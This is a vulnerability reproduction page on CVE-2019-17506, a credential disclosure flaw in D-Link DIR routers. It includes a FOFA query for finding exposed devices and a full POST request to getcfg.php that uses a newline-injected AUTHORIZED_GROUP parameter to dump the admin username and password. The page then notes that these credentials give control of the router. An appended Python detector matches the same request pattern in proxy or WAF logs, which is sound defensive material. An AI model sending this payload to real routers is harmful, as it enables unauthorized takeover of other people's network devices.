# D-Link Dir-645 getcfg.php Account and Password Disclosure Vulnerability CVE-2019-17506

### Vulnerability Description <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

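Some web interfaces on the D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers do not require authentication. An attacker can obtain the router's username and password (and other information) from getcfg.php by sending a SERVICES value of DEVICE.ACCOUNT together with AUTHORIZED\_GROUP=1%0a. This can be used to remotely control the router.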

### Affected Versions <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

Multiple versions of the D-Link DIR series

### FOFA <a href="#fofa" id="fofa"></a>

`app="D_Link-DIR-868L"`

### Reproduction <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

The login page looks like this:

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr0ZKsvrrOfwlGU3S0%2Fimage.png?alt=media\&token=fb1a26a7-ed27-49a2-bcba-b506109e0072)

Send the following request:

```
POST /getcfg.php HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Length: 61

SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr0bdWFb9bKB0isRu5%2Fimage.png?alt=media\&token=890ab61b-c822-4b39-807f-7c157fe88eda)

Once the router's account name and password have been obtained, they can be used to log in to the admin interface.
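
A detection check for the request pattern shown above, for use on proxy or WAF logs in front of affected devices. This is an added example, not part of the original write-up: the function names, reason strings and the benign sample value `EXAMPLE.SERVICE` are constructed for illustration, and the check also covers double percent-encoding, which goes beyond the single request on this page.

```python
import re
from urllib.parse import unquote_plus

# A CR or LF directly before an AUTHORIZED_GROUP assignment, looked for
# after percent-decoding the submitted parameters.
INJECTED_GROUP = re.compile(r"[\r\n]\s*AUTHORIZED_GROUP\s*=", re.IGNORECASE)
# The SERVICES parameter asking for the DEVICE.ACCOUNT service.
ACCOUNT_SERVICE = re.compile(r"(?:^|&)SERVICES=[^&]*DEVICE\.ACCOUNT", re.IGNORECASE)


def decode_params(raw, rounds=2):
    """Percent-decode up to `rounds` times so %250a is treated like %0a."""
    for _ in range(rounds):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw


def classify_request(path, body):
    """Return the reasons a request matches the getcfg.php pattern, or []."""
    route, _, query = path.partition("?")
    if not route.lower().endswith("/getcfg.php"):
        return []
    # Inspect query string and form body together.
    params = decode_params(query + "&" + body)
    reasons = []
    if INJECTED_GROUP.search(params):
        reasons.append("newline-injected AUTHORIZED_GROUP")
    if ACCOUNT_SERVICE.search(params):
        reasons.append("DEVICE.ACCOUNT service requested")
    return reasons


if __name__ == "__main__":
    # Constructed sample log entries: (path, form body).
    samples = [
        ("/getcfg.php", "SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1"),
        ("/getcfg.php", "SERVICES=DEVICE.ACCOUNT&x=1%250aAUTHORIZED_GROUP%253d1"),
        ("/getcfg.php", "SERVICES=EXAMPLE.SERVICE"),
    ]
    for path, body in samples:
        print(path, body, "->", classify_request(path, body) or "no match")
```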
